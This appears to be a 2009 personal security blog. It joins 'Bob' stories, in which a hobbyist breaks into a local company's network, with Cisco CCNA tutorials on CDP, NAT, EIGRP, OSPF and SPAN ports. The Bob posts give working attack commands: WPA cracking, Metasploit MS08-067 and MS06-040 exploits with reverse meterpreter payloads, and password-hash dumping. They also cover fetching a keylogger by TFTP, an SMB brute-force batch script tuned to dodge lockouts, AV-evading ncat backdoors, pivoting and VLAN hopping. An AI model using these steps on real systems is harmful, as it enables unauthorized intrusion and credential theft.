Getting his tools onto the compromised hosts is important, but uploading them one by one is a pain in the arse. Then Bob remembers something he heard in a great presentation on post exploitation from Dean Der Beer, a reference to a tool called Metacab. He takes a look at Metacab but decides against using it. Bob really likes the idea of Metacab but he wants a different set of tools so he goes about making his own version. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload and extract the files from the cab with native windows tools from straight from the command-line.

The one tool he cannot do without is netcat but AV picks it up quite easily. Then Bob remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through virustotal to see what gives.

Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he decides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications (PUA) on the host.

Tools List

cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe

As expected VirusTotal finds nothing wrong with his other tools, but then again why would it.

So looking at his tools Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his hosts CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just encase they had been removed by the Sys Admin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. If not, he'll go back to the drawingboard and create a new cab file.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly.

His first bat file is a simple bruteforce script that will use in-built windows functions to bruteforce shares. He'll supply a userlist (names.txt) and a common password list (words.txt) to the bat file. The password list will be common passwords and can be tweaked using the inbuilt DOS Edit tool when he's on the target, and the userlists will be generated from his enumeration tool dsquery . After running the bruteforce script any succesfull logins will be saved to a text file (creds.txt). Bob knows from performing password audits in his other life that even when complex passwords are enforced users will still pick dumb complex passwords, such as Password01. And when it comes to change it......well of course were looking at Password02!

Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.

Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use \\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target% /del)

Bob will use the either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory and if you know what your doing you can use them to pretty much find out anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admins box to get some juicy info.

The next bat file that bob will include is to check for hosts that respond to a ping and output the results to a file.

set /P subnet="Enter subnet:"
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply"

Another bat file is created to perform reverse lookups using a nslookup FOR loop.

set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i

And finally a bat file to use the Portqry tool for port scans against hosts in a host file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p tcp

Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.

;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors
.Set MaxCabinetSize=0
.Set MaxDiskSize=0
.Set CabinetNameTemplate=bin.cab
.set DiskDirectoryTemplate=CDROM ;
.Set CompressionType=MSZIP ;
.Set UniqueFiles="OFF"
.Set Cabinet=on
.Set DiskDirectory1=bin bf.bat
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
hosts.txt
names.txt
ncat.exe
net.exe
ngrep.exe
pingsweep.bat
pmon.exe
port-scan.bat
PortQry.exe
reg.exe
rev-lookup.bat
srvinfo.exe
WinDump.exe
words.txt
;*** EOF

And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file is in the same directory and.....

makecab /F bin.ddf

Perfect, after building his cab file it comes in at less than 1MB, Bob honestly couldn't be happier. He'll have to use the windows built-in tool called Expand.exe to get his files out of the cab.

expand /F:* bin.cab .

Right with that done Bob is almost ready to hop onto his target and put his tools to good use and start his network exploration.

Bob Builds His Custom Payloads - Part 4 .......coming next

The Amazing Adventures of Bob!

2009-11-03T21:41:00.019Z

I'll be putting together a few Bob Stories of the next little while so this is just really a place holder so my "Previous Entries" sidebar list doesn't get out of control.

Throughout these stories you will hopefully see Bob progress from a hapless script kiddie into a mean lean penetration machine. But then again, you might not!

Bobs Double Penetration Adventure - Part 1

Bobs Double Penetration Adventure - Part 2

Bob Prepares For Action - Part 3

Bob The Backdoor Man - Part 4

Bob The Backdoor Man (continued) - Part 5

What Bob Did. What Alice Saw - Part 1

What Bob Did. What Alice Saw - Part 2

Bobs Double Penetration Adventure - Part 2

2009-10-31T09:03:00.015Z

So Bob decides to revisit his new found playground at Walliford Fries and get to grips with his new tools. He connects up to the wifi with the password he's already cracked and this time rather than using the Autopwn feature he decides to try something else. Bob's idea is to use the PC he exploited previously as a point to launch other attacks deeper into the network.

Bob launches his trusty MS08-067 exploit this time with a meterpreter/reverse_tcp payload

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102
set ExitOnSession False
exploit -j -z

Excellent, Bob gets his session. He connects to the session and checks the network settings on his compromised host.

sessions -i 1
execute -H -f cmd.exe -i
ipconfig

While he is on the remote host Bob checks a few things, ideally he could do with knowing about the network servers. At this point he just wants the basics, name & IP.

Net view

And he could do with the IP addresses too. He'll want these for his scans.

ping -n 1 server01
ping -n 1 server02

That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and creates a route pointing to the internal LAN through his session.

exit
background
route add 10.0.1.0 255.255.255.0 1
route print

Now time to see if the magic works. Bob selects the auxiliary scanner and checks the OS versions of the two servers on the internal LAN by pivoting through his compromised host.

use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230
run
set RHOSTS 10.0.1.231
run

Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that through the pivot?

use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

Bugger! No such luck. Hang on though, Bob remembers something he read once. He can use Mubix's handy dandy deploymsf script to install Metasploit on his compromised host. Perfect!

He grabs files he needs from the web, putting them into his plugin directory.

cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

And then it's just a case of connecting back to his session on the pwned box, running the script and pointing it to the metasploit executable.

sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe

Holly crap Batman! look at that. Bob has installed Metasploit on the host he compromised, thanks to a weak password on the wireless LAN and a missing patch or two.

Now the output isnt always pretty but it gets the job done.

So whats next? Well there is that server with no service pack to take care of. For that Bob will try his old faithful ms06_040 exploit.

use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this network for as long as possible so he's going to need to start pulling together some serious information. He could get this all manually but of course that's pretty dumb, especially when he can use Dark Operators excellent WinEnum script. This will go out and grab nearly everything he wants so he acn understand the network better and stick it all in one big text file so Bob has some bedtime reading. As Bobs already sitting in a meterpreter session he simply runs the WinEnum script.

run winenum

Sorted. Again it's getting late so Bob decides to call it a day. Before he does though he needs to leave himself a few backdoors.......which will of course be in the next post.

Bobs Double Penetration Adventure - Part 1

2009-10-24T21:03:00.030+01:00

A couple of days ago a mate at work asked about the security issues surrounding computers that are connected to the company network and also to the Internet via a wifi connection. This question was perfect fodder for a Bob story I thought. So the story goes.......

Bobs a curious fella and he really likes to explore. Lately he's been learning about hacking, nothing evil, just really having a look in places that he shouldn't be looking, you know, a curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking adventures is Walliford Fries, a chip maker based in his small town. He has nothing against Wallifords, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he can get onto the Walliford network with some if these free hacking tools he's downloaded from the web and use Wallifords as his new playground.

Bob's not a traditional hacker, he doesn't go to the targets website and spend hours going through the detail, looking for business relationships, email address, job postings etc.. He hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop sporting a brand new install of BackTrack4 and looked at whats about on the Wifi.

That's interesting, here he has a WPA network called WF-IT that is no doubt Walliford Fries related, After all, his house is within spitting distance of the Walliford offices. Shame its not WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to customise his word list for this particular target, so he decides to scrape Wallifords website and add all those words to his wordlist.

wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/
cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt
cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt

After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need to create a hash of his wordlist to bruteforce the WPA key he just opts for his small but popular password list, if this fails he'll have to go for the bigger wordlist he likes to call "Mother", but first he'll opt for the easy option.

cat WF-customlist >>/root/temp/wordlist.txt

Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs the necessary BSSIDs of the access point and a client.

airmon-ng start wlan0 11

airodump-ng -c 11 mon0

With the BSSID of the client and the Access Point he starts his capture and saves it to a file.

airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0

With the capture going he sends a few de-auths packets so he can capture the 4 way handshake, this is critical for him to perform his WPA crack.

aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0

Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file from the custom wordlist, hopefully all this effort will pay off.

To generate the hash he uses the genpmk tool from the cowpatty directory.

./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT

And to crack the key he uses cowpatty.

./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT

Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor mode and connecting to the AP.

airmon-ng stop mon0

Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the wifi network for other hosts.

nmap 192.168.2.0/24 -sP

Got one, well two if you count the Linksys AP but lets focus on the one using the Belkin card for now. Wondering what ports it has open Bob puts Nmap to good use, again saving the results to a file.

nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap

Bobs intention is to fire up Nessus and scan his target but first he knows a quick way to check for a vulnerability that he knows he has a working exploit for.

nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1

Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the conficker exploit. He can't believe that Walliford still has unpatched PC's for this vulnerability. I guess the guys from pauldotcom are right. They have a firewall and they have AV so there safe right? Wrong!

Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might have some fun with.

Well Nessus confirmed the vulnerability from his Nmap scan which is good but it doesn't find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.

After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any exploits that it has against the ports it's found open.

db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe
db_hosts
db_autopwn -p -e -r -t

Oh and time for another crazy dance, Bob gets a session on the remote host and he can see that he's got system privileges which is always nice. He dumps out the local users hashes for some John the Ripper fun later and he checks out the route table. Superb, he can see that the remote host is also connected to the Walliford LAN.

sysinfo
getuid
hashdump

At this point Bob decides at this point to get a little interactive so he pulls up a command prompt on the compromised host.

execute -H -f cmd.exe -i

He TFTP's a couple of handy dandy files from his laptop and grabs the hashes of any domain accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these are going to be quite useful for his exploration adventures in his new playground.

tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe
cachedump.exe

Now he decides to have a little look around on the server. He maps a drive to the IT folder and attempts to have a poke around.

net view \\server01
net use * \\server01\IT

Damn. The NTFS permissions wont allow him access. Then it dawns on him, the system account he is using doesn't have permissions on the server. Maybe not but with a hostname like PC-IT-1 the logged in user probably will have. He comes out of his session lists the processes and then migrates to a process which is running in the context of the user.

quit
ps
getuid
migrate 784
getuid

Perfect, he's migrated to the Explorer.exe process and now he's now running as James. Bob launches an interactive shell again and checks his mapped drives.

execute -H -f cmd.exe -i
net use
I:

Brilliant. Bobs got access to the IT folder. From here he can have a good poke around before he decides his next move. He's got some good old fashioned password cracking to do and times getting on so Bob decides to call t a day for now.

Abusing VLANs With BackTrack

2009-10-18T20:23:00.015+01:00

In this post I'm going to have a little fun with VLANs. As I've been studying for the CCNA cert I've been reading how great VLANs are, so in this post i'm going to have a little fun with some really cool tools from the Backtrack distro. My aim is to demonstrate why simlpy placing hosts in a seperate VLAN might sometimes not be enough if you really don't want anyone to have access to them. Let's get started.

Tools
BackTrack
Yersinia
vconfig
Wireshark
Nmap

I start off by connecting to the LAN and getting a network address

dhclient eth0

I can see that I'm attached to the network 10.0.1.0/24

Next I fire up wireshark and check the network for DTP (Dynamic Trunking Protocol) frames and CDP (Cisco Discovery Protocol) frames.

I can see that I have both CDP and DTP frames present.

Now I want to tell the switch that my port is a trunk port, for this I'll use Yersinia and tell it to look at DTP.

yersinia -I

After I see DTP frames appear in Yersinia I launch the attack to configure the port for trunking.

Now I need to know the VLAN number that other networks are on. Before launching Yersinia I could only see traffic from my own network (10.0.1.0/24), now I can start to see traffic from hosts on another network (192.168.2.2).

Looking at the 802.1Q information in the frame I can see that the other network is on VLAN 2.

With this information I'll create a new interface in the new network and configure vconfig to tag the frames for VLAN2.

vconfig add eth0 2
ifconfig eth0.2 up
ifconfig eth0.2 192.168.2.200/24
ifconfig

Now I check I can ping the host I saw with Wireshark and I have a quick look at it's ports with Nmap.

ping -c 2 192.168.2.2
nmap 192.168.2.2

Great, I have plenty here to play with, and on port 80 ...........

Okay obviously this was staged but hopefully it illustrates two things. VLANs can be abused and Yersinia rocks!!!!!!!!!

Discovering Devices with CDP

2009-10-03T15:03:00.008+01:00

I touched on CDP briefly in a previous post, but here I'll talk a little more about why CDP is so great and how it can be used to help map and manage your network.

CDP stands for Cisco Discovery Protocol and is basically where your switch or router broadcasts a packet out of every interface stating some information about itself. This information includes:

IP Address
Port number
Port type
Device name
Device hardware
IOS version
Port speed
Duplex settings
Vlan information

That's right, all this really useful information gets thrown out of every port every minute by default and most of us just ignore it. Well if your a Cisco device you don't. If your a Cisco device you'll take that information and keep it in memory and build up a neighbor database. And if your a geek like me you can use that information to help you map your network and have some CDP fun! Here's how.

Configuring CDP

Well there's not much to configure. It's on by default it just works.

Secure#show cdp
Global CDP information:

Sending CDP packets every 60 seconds

Sending a holdtime value of 180 seconds

Sending CDPv2 advertisements is enabled

I can see from the output above that CDP packets are sent every 60 seconds. If I wanted to send CDP packets every 30 seconds I could configure that using the following command:

Secure(config)#cdp timer 60

OK, lets see what information CDP gives us.

Secure#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater

Device ID Local Intrfce Holdtme Capability Platform Port ID

S1 Eth 0 151 S I WS-C2950-2Fas 0/17

S1 Eth 1 151 S I WS-C2950-2Fas 0/1

Here I can see that I have my routers port Ethernet 0 connected to port FastEthernet 0/17 on a 2950 switch and Ethernet 1 connected to port FastEthernet 0/1 on a 2950 also. I can also see that the Device ID is S1 which is the name of my switch. Wouldn't it be useful if I new the IP Address of the switch as well. Well here's how we find that out.

Secure#show cdp neighbors detail
-------------------------

Device ID: S1

Entry address(es):

IP address: 10.0.1.210

Platform: cisco WS-C2950-24, Capabilities: Switch IGMP

Interface: Ethernet0, Port ID (outgoing port): FastEthernet0/17

Holdtime : 158 sec

Version : Cisco Internetwork Operating System Software

IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)

Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2

Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F

VTP Management Domain: ''

Duplex: full

Power drawn: 4294967.294 Watts

-------------------------

Device ID: S1 Entry address(es):

IP address: 10.0.1.210

Platform: cisco WS-C2950-24, Capabilities: Switch IGMP

Interface: Ethernet1, Port ID (outgoing port): FastEthernet0/1

Holdtime : 158 sec

Version :

Cisco Internetwork Operating System Software

IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)

Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2

Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F VTP Management Domain: ''

Duplex: full

Power drawn: 4294967.294 Watts

So from here I can start to diagram my network by hopping from decice to device and adding in detailed information about connected devices that CDP knows about. I can see which ports are fastethernet and which are not, which are full duplex and so much more.

So by now were realising that this CDP information is great to an administrator but probably great to an attacker too so let's say we don't want CDP leaving my router on interface ethernet 1 for example. Here's how we do that.

Before I stop CDP on the router I check the switch and make sure it is working as expected.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater

Device ID Local Intrfce Holdtme Capability Platform Port ID

Secure Fas 0/17 129 R Cisco C831Eth 0

Secure Fas 0/1 129 R Cisco C831Eth 1

I can see that I have 2 CDP entries as expected. Now I go to my router and stop CDP on Ethernet 1.

Secure#conf t
Secure(config)#interface ethernet 1
Secure(config-if)#no cdp enable
Secure(config-if)#exit

I go back to my switch and see whats going on there.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater

Device ID Local Intrfce Holdtme Capability Platform Port ID

Secure Fas 0/17 179 R Cisco C831Eth 0

Secure Fas 0/1 119 R Cisco C831Eth 1

I can see the CDP entry is still there but the holddown timer for Eth1 is still expiring whilst Eth0 has refreshed after it recieved a packet at the 60 second period.

Finally after the 180 seconds has passed I can see the CDP entry for Eth1 drop out.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater

Device ID Local Intrfce Holdtme Capability Platform Port ID

Secure Fas 0/17 159 R Cisco C831Eth 0

And thats about it for CDP.

NAT Overload

2009-10-03T10:27:00.007+01:00

In this post i'll configure NAT Overload (PAT) on my Cisco router.

NAT is primarily used for the following purposes.

To efficiently utilise public IP addresses and slow the depletion of IP version 4 addresses.
To help mask the internal IP address ranges from external sources.
To aid in the merge of similiarly addressed networks.

NAT can either be used in a one to many configuration (PAT), or a one to one configuration (Static or Dynamic). Here I'll cover NAT Overload.

When used in a one to many configuration the router uses the port numbers to remember connections. For example:

Internal - External
192.168.1.1:4567 - 80.233.1.67:4567
192.168.1.2:3458 - 80.233.1.67:3458

The same external address is used however the external address uses the internal addresses source port number as its own source port number.

Configuration

To configure NAT Overload so all my internal hosts on the address subnet 192.168.2.0 (defined in the access list in step 3) use the address 192.168.2.200 (as defined in the NAT pool in step 2).

1. Name the interfaces.

Secure#conf t
Secure(config)#interface eth 0
Secure(config-if)#ip nat inside
Secure(config)#interface eth 1
Secure(config-if)#ip nat outside
Secure(config-if)#exit

2. Create the Pool of addresses to be used to NAT

Secure(config)#ip nat pool Secure-Pool 192.168.2.10 192.168.2.10 net 255.255.255.0

3. Create a standard ACL that identifies addresses that will be NAT'd

Secure(config)#ip access-list standard 10
Secure(config-std-nacl)#permit 192.168.2.0 0.0.0.255

4. Enable NAT
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

When I ping the external host all traffic is seen as coming from the address that I set up in the pool.

All works well but because of my lab setup I need to change the pool address to one that works on my other network which connects to the internet.

Secure(config)#no ip nat inside source list 10 pool Secure-Pool overload
Secure(config)#ip nat pool Secure-Pool 10.0.1.199 10.0.1.199 net 255.255.255.0
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

Now from my lab I can get access to the web and if I ping a host on my lab net I see the correct NAT address returned.

Troubleshooting and Debugging

A useful show command for looking at active translations is:

Secure#show ip nat translations
Pro Inside global Inside local Outside local Outside global
icmp 10.0.1.199:768 192.168.2.4:768 10.0.1.5:768 10.0.1.5:768
--- 10.0.1.199 192.168.2.4 --- ---

For looking at translations as they happen you can use:

Secure#terminal monitor
Secure#debug ip nat detailed
IP NAT detailed debugging is on
Secure#
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56303]
*Sep 27 14:09:52.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [32653]
*Sep 27 14:09:52.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [32653]
Secure#
*Sep 27 14:09:53.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56304]
*Sep 27 14:09:53.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56304]
*Sep 27 14:09:53.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [61886]
*Sep 27 14:09:53.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [61886]
Secure#
*Sep 27 14:09:54.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56305]
*Sep 27 14:09:54.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56305]
*Sep 27 14:09:54.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [47007]
*Sep 27 14:09:54.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [47007]
Secure#
*Sep 27 14:09:55.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56306]
*Sep 27 14:09:55.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56306]
*Sep 27 14:09:55.915: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [28657]
*Sep 27 14:09:55.915: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [28657]
Secure#

In the output above we can see that were looking at ICMP traffic from 192.168.2.4 to 10.0.1.5 which is NAT'd to 10.0.1.199.

For NAT statistics:

Secure#sh ip nat statistics
Total active translations: 2 (0 static, 2 dynamic; 1 extended)
Outside interfaces:
Ethernet1
Inside interfaces:
Ethernet0
Hits: 4295 Misses: 212
CEF Translated packets: 3413, CEF Punted packets: 1847
Expired translations: 637
Dynamic mappings:
-- Inside Source
[Id: 7] access-list 2 pool Secure-Pool refcount 2
pool Secure-Pool: netmask 255.255.255.0
start 10.0.1.199 end 10.0.1.199
type generic, total addresses 1, allocated 1 (100%), misses 0
Queued Packets: 0
Secure#

IP Routing - EIGRP

2009-09-27T10:22:00.004+01:00

Right, first a bit about EIGRP from my notes.

EIGRP (Enhanced Interior Gateway Routing Protocol) a cisco proprietry hybrid routing protocol and uses the DUAL algorithm for selecting the best path to remote networks. It has both link state and distance vector characteristics. EIGRP has an administrative distance of 90.

EIGRP uses a multicast address of 224.0.0 to send updates as the topology changes. If the router does not receive a reply from a neighbor after sending the multicast update it will use unicast. A list of neighbors are maintained in the neighborship table. After the router has sent 16 unicasts and recieved no reply the neighbor will be declared dead and removed from the neighborship table.

EIGRP will only share routing information with it's neighbors if they share the same AS number. All updates that EIGRP receives are entered into it's topology table and the best routes are selected by DUAL and entered into the routing table.

EIGRP (unlike IGRP) includes the subnet mask in it's advertisements which allows it to utilise VLSM and summarisation and supports discontiguous networks. By default EIGRP uses bandwidth and delay to calculate the best route to a remote network. EIGRP can loadbalance across up to 6 equal or unequal cost links but the default is 4.

My Lab

I'll be using the same lab as in previous posts.

Router 1 (R1)

FastEthernet 0/0 - 192.168.1.1/24

loopback 0 - 172.16.10.0/24

loopback 1 - 10.1.1.0/24

Router 2 (R2)

FastEthernet 0/0 - 192.168.1.2/24

FastEthernet 1/0 - 192.168.2.1/24

Router 3 (R3)

FastEthernet 0/0 - 192.168.2.2/24

Configuring EIGRP

Below I'm going to remove OSPF which was set up in a previous lab and configure all of my routers with EIGRP.

R1#sh ip protocols

Routing Protocol is "ospf 10"

Outgoing update filter list for all interfaces is not set

Incoming update filter list for all interfaces is not set

Router ID 172.16.10.1

It is an autonomous system boundary router

Redistributing External Routes from,

Number of areas in this router is 1. 1 normal 0 stub 0 nssa

Maximum path: 4

Routing for Networks:

172.16.10.0 0.0.0.255 area 0

192.168.1.0 0.0.0.255 area 0

Reference bandwidth unit is 100 mbps

Routing Information Sources:

Gateway Distance Last Update

192.168.2.2 110 00:01:01

Distance: (default is 110)

First I'll remove OSPF

R1#conf t

R1(config)#no router ospf 10

R1(config)#end

And now I'll configure EIGRP with an AS of 10. To configure EIGRP on all the routers in the diagram I use the following commands:

R1#conf t

R1(config)#router eigrp 10

R1(config-router)#network 192.168.1.0 0.0.0.255

R1(config-router)#network 172.16.10.0 0.0.0.255

R1(config-router)#end

R2#conf t

R2(config)#no router ospf 10

R2(config)#router eigrp 10

R2(config-router)#network 192.168.1.0 0.0.0.255

R2(config-router)#network 192.168.2.0 0.0.0.255

R2(config-router)#end

R3#conf t

R3(config)#no router ospf 10

R3(config)#router eigrp 10

R3(config-router)#network 192.168.2.0 0.0.0.255

R3(config-router)#end

I now check my routing table on R3 to make sure I see the routes from R1.

R3#sh ip route

Gateway of last resort is not set

D 172.16.0.0/16 [90/158720] via 192.168.2.1, 00:00:14, FastEthernet0/0

D 192.168.1.0/24 [90/30720] via 192.168.2.1, 00:00:14, FastEthernet0/0

C 192.168.2.0/24 is directly connected, FastEthernet0/0

Routes starting with a D are EIGRP routes. Now I check I can ping one of the remote networks.

R3#ping 172.16.10.1

Type escape sequence to abort.

Sending 5, 100-byte ICMP Echos to 172.16.10.1, timeout is 2 seconds:

!!!!!

Success rate is 100 percent (5/5), round-trip min/avg/max = 8/29/52 ms

I also need to set the default network so it gets advertised through EIGRP.

R1(config)#ip default-network 172.16.10.1

R1(config)#end

Now supposing I want to prevent one of the interfaces on a router from sending out or receiving advertisements.

R2(config)#router eigrp 10

R2(config-router)#passive-interface fastEthernet 1/0

The following message is displayed on the console screen to indicate that the interface will not be sending out EIGRP routes.

00:52:21: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 10: Neighbor 192.168.2.2 (FastEthernet1/0) is down: interface passive

And on R3 I get the following message:

00:52:27: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 10: Neighbor 192.168.2.1 (FastEthernet0/0) is down: Interface Goodbye received

On checking R3's routimg table I see that all the EIGRP routes are dropped.

R3#sh ip route

C 192.168.2.0/24 is directly connected, FastEthernet0/0

Troubleshooting and Debug Commands

R3#sh ip route summary

R1#sh ip protocols

R2#sh ip eigrp interfaces

R3#debug ip eigrp

R2#sh ip eigrp traffic 10

R2#sh ip eigrp neighbors detail

Monitoring Traffic with Span Ports

2009-09-26T11:01:00.006+01:00

This is just a quick post to detail the configuration of setting up a Span Port on a Cisco 2950 switch to monitor traffic.

Previously I had used either a hub or ARP poisoning to capture traffic in a switch environment. On my Cisco switch I can capture traffic by telling the switch to send a copy of all traffic destined for one port (or multiple ports) to another port.

Span Port Configuration

In the configuration below I have told the switch to send a copy of all data sent or received from the port range 3 - 5 to port 23

S1(config)#monitor session 1 source interface fastEthernet 0/3 - 5 both

S1(config)#monitor session 1 destination interface fastEthernet 0/23

The configuration can be verified with the following command:

S1#sh monitor session 1

This works across VLANs too, as port 23 is configured into a separate VLAN from ports 3 to 5.

This should emphasise the need to secure your switch (passwords, SSH, lock down ports etc..) as it is obviously great for monitoring traffic but can also be used by an attacker to capture traffic.

Links

Here is a great Cisco article on all things Span Port!

IP Routing - OSPF

2009-09-25T16:07:00.005+01:00

In this post I'm going to describe a few benefits of OSPF and how to configure it.

OSPF stands for Open Shortest Path First and and is a link state, non-proprietary, classless routing protocol. OSPF uses the dijkstra algorithm to calculate routes and has an administrative distance of 110.

The main advantages of OSPF are the fast convergence time and the low bandwidth use. Unlike RIP which is a flat network OSPF networks can be structured. Areas are used to structure the network and each router needs to have an interface in area 0 which is the backbone network. For the CCNA exam only area 0 is used. OSPF can also be configured to use authentication on it's routing updates.

Configuring OSPF

Below is a diagram of the routers I'll be referring to in this post.

Router 1 (R1)

FastEthernet 0/0 - 192.168.1.1/24

loopback 0 - 172.16.10.0/24

loopback 1 - 10.1.1.0/24

Router 2 (R2)

FastEthernet 0/0 - 192.168.1.2/24

FastEthernet 1/0 - 192.168.2.1/24

Router 3 (R3)

FastEthernet 0/0 - 192.168.2.2/24

Okay, lets get started.

I'll remove RIP so router 3 doesn't know about the 172.16.10.0 subnet on router 1.

R3#conf t

R3(config)#no router rip

R3(config)#exit

R3#sh ip route

Gateway of last resort is not set

C 192.168.2.0/24 is directly connected, FastEthernet0/0

R3#

Below I'll remove RIP from Routers 1, 2 and 3, configure them with OSPF and verify routes propagated.

R1#conf t

R1(config)#no router rip

R1(config)#router ospf 10

R1(config-router)#network 192.168.1.0 0.0.0.255 area 0

R1(config-router)#network 172.16.10.0 0.0.0.255 area 0

R1(config-router)#end

I also have an network 10.1.1.0 that I dont want published so I leave this out.

R2#conf t

R2(config)#no router rip

R2(config)#router ospf 10

R2(config-router)#network 192.168.1.0 0.0.0.255 area 0

R2(config-router)#network 192.168.2.0 0.0.0.255 area 0

